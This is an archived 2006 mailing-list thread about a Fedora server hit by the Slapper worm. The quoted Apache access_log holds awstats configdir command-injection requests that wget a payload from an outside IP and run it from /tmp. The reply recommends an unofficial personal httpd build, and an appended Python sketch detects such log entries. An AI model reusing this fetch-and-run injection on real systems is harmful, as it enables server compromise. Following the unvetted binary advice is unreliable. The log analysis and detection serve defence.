slapper worm

James Kosin jkosin at beta.intcomgrp.com
Mon Jan 23 20:42:22 UTC 2006


Michael Mansour wrote:
> Hi guys,
> 
> I have an FC1 machine which got infected twice with the slapper worm, and then
> started DOS attacking a large vendor.
> 
> I've stopped slapper in its tracks with a couple of changes to FC1, but in
> analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache
> SSL server which I've now turned off), I see the following bit of interest in
> my apache access_log:
> 
> 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 
> These "scripz" files end up going into /tmp, being compiled with gcc, renamed
> to "httpd" and run as that.
> 
> I'm using:
> 
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
> 
> Are there any updates FL can do to any of the packages to fix/block slapper
> from an FC1 machine?
> 
> Michael.
> 


Michael,

Try my version of httpd here:
http://support.intcomgrp.com/~jkosin

It has been effective against the worm so far.

James Kosin
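
A detection sketch for access_log entries like the ones quoted above, added here as an example and not code from either poster or from the Fedora Legacy project: it URL-decodes the `configdir` parameter before looking for shell metacharacters, and uses the status code to separate requests the server rejected from ones it actually handled. The `findings` helper, the watched-parameter set and the sample lines (documentation addresses) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache log prefix: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) \S+')
# Shell metacharacters that have no business in a directory-name parameter.
SHELL_META = re.compile(r"[|;&`$<>\n]")
WATCHED = {"configdir"}  # assumption: the parameter seen in the quoted entries


def findings(line):
    """Return one finding per watched parameter whose decoded value holds shell metacharacters."""
    m = LOG_RE.match(line)
    if not m:
        return []
    host, when, _method, target, status = m.groups()
    path, _, query = target.partition("?")
    out = []
    # Split on '&' only: the raw ';' inside the value must not be treated
    # as a pair separator, which some query-string parsers do.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode first so %3b and %7c are seen as ; and |
        if name.lower() in WATCHED and SHELL_META.search(value):
            verdict = "SERVED (2xx): investigate host" if status.startswith("2") else "rejected by server"
            out.append({"host": host, "time": when, "path": path,
                        "status": int(status), "decoded": value, "verdict": verdict})
    return out


# Constructed sample lines, shaped like the quoted entries (not the hosts from the post).
SAMPLE = [
    '192.0.2.44 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bid;echo%20YYY;echo| HTTP/1.1" 403 344',
    '198.51.100.7 - - [23/Jan/2006:08:40:11 +1100] "GET /cgi-bin/awstats.pl?configdir=%7cid%7c HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Jan/2006:09:01:54 +1100] "GET /awstats/awstats.pl?config=www.example.org&framename=index HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for line in SAMPLE:
        for f in findings(line):
            print(f["time"], f["host"], f["path"], f["status"], f["verdict"], repr(f["decoded"]))
```

Entries answered with 403 or 404, as in the quoted log, were not handed to the script at that path; a 2xx answer to the same kind of request is the case that warrants checking the host.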




More information about the fedora-legacy-list mailing list